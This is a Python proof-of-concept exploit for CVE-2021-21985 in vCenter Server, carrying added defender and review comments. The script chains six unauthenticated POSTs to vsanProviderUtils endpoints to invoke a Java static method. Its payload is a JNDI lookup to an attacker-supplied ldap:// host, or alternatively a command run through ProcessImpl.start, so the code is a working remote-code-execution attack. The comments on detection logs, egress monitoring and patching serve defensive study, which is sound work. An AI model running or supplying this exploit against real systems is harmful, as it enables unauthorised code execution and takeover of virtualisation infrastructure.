vCenter Server CVE-2021-21985 POC
# Proof-of-concept client for CVE-2021-21985 (vCenter Server).
#
# What it does on the wire: six sequential HTTP POSTs, each with a JSON body of
# the form {"methodInput": [...]}, to paths under
#   /ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_<bean>/<method>
# The cookie dict is empty, so no session is presented with any request.
#
# Defender notes:
#   * Detection: access logs / reverse-proxy logs showing POSTs to
#     /ui/h5-vsan/rest/proxy/service/ whose next path segment starts with
#     "&vsanProviderUtils_", especially the setTargetObject -> setStaticMethod ->
#     setTargetMethod -> setArguments -> prepare -> invoke order used here.
#     The User-Agent below is hard-coded but trivially changed, so treat it as a
#     weak indicator only.
#   * Detection: unexpected outbound DNS/LDAP traffic from the vCenter host
#     (the payload built in step4 references the caller-supplied host).
#   * Mitigation: apply the vendor fix for CVE-2021-21985, keep the vCenter
#     management interface off untrusted networks, and restrict egress from
#     the appliance.
import requests
import json
import sys

# Usage: python CVE-2021-21985.py <base-url> <callback-host> <mode>
#python CVE-2021-21985.py https://test.com/ xx.dnslog.cn 2
url = sys.argv[1]   # base URL; paths starting with "/" are appended to it as-is
dns = sys.argv[2]   # host name embedded in the step4 payload
# NOTE(review): exp stays a str (no int() conversion), while step2-step4 compare
# it with the int 1. That comparison is False for every command-line value, so
# the `else` payloads (javax.naming lookup) are what this script actually sends;
# detections written from this PoC should key on that form.
exp = sys.argv[3]
header = {'Content-Type':'application/json','User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0'}
cookie = {}   # empty: requests are sent without any session cookie
# Silences the warning that verify=False would otherwise raise; together they
# mean the server certificate is never validated, so replies are unauthenticated.
requests.packages.urllib3.disable_warnings()


def step1(url):
    """POST [None] to setVsanServiceFactory/setTargetObject, then run step2.

    Continues only if the response body is exactly '{"result":null}'.
    No timeout is passed, so the call can block indefinitely.
    """
    urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVsanServiceFactory/setTargetObject'
    data = {"methodInput":[None]}
    r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False)
    if r.text == '{"result":null}':
        print('step1 success')
        step2(url,exp)   # exp here is the module-level global, not a parameter
    else :
        print('step1 error')


def step2(url,exp):
    """POST a fully qualified Java method name to setVmodlHelper/setStaticMethod.

    Two alternative names are present; see the note on `exp` at module level
    for which one is sent. Proceeds to step3 on an exact '{"result":null}' body.
    """
    urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setStaticMethod'
    data = {"methodInput":["java.lang.ProcessImpl.start"]} if exp == 1 else {"methodInput":["javax.naming.InitialContext.doLookup"]}
    r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False)
    if r.text == '{"result":null}':
        print('step2 success')
        step3(url,exp)
    else :
        print('step2 error')


def step3(url,exp):
    """POST the bare method name to setVmodlHelper/setTargetMethod.

    Proceeds to step4 on an exact '{"result":null}' body.
    """
    urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setTargetMethod'
    data = {"methodInput":["start"]} if exp == 1 else {"methodInput":["doLookup"]}
    r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False)
    if r.text == '{"result":null}':
        print('step3 success')
        step4(url,dns,exp)   # dns is read from the module-level global
    else :
        print('step3 error')


def step4(url,dns,exp):
    """POST the argument list to setVmodlHelper/setArguments.

    The payload embeds the caller-supplied `dns` value: either as the argument
    of a `ping` command or inside an ldap:// URL on port 1389. Either form makes
    the supplied host appear in outbound traffic if the chain completes, which
    is the observable a defender can monitor for. Proceeds to step5 on an exact
    '{"result":null}' body.
    """
    urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setArguments'
    data = {"methodInput":[[["ping",dns],None,".",None,True]]} if exp == 1 else {"methodInput":[["ldap://"+dns+":1389/Exploit"]]}
    r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False)
    if r.text == '{"result":null}':
        print('step4 success')
        step5(url)
    else :
        print('step4 error')


def step5(url):
    """POST an empty argument list to setVmodlHelper/prepare, then run step6.

    Proceeds only on an exact '{"result":null}' body.
    """
    urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/prepare'
    data = {"methodInput":[]}
    r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False)
    if r.text == '{"result":null}':
        print('step5 success')
        step6(url)
    else :
        print('step5 error')


def step6(url):
    """POST an empty argument list to setVmodlHelper/invoke.

    Unlike the earlier steps, the response is never inspected: 'step6 success'
    is printed whenever the request returns, so this output alone does not show
    that a host is affected. A 5-second timeout is set and the resulting
    exception is not caught here.
    """
    urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/invoke'
    data = {"methodInput":[]}
    r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False,timeout=5)
    print('step6 success')


# Entry point: runs at import time as well as when executed as a script,
# because there is no `if __name__ == "__main__"` guard.
step1(url)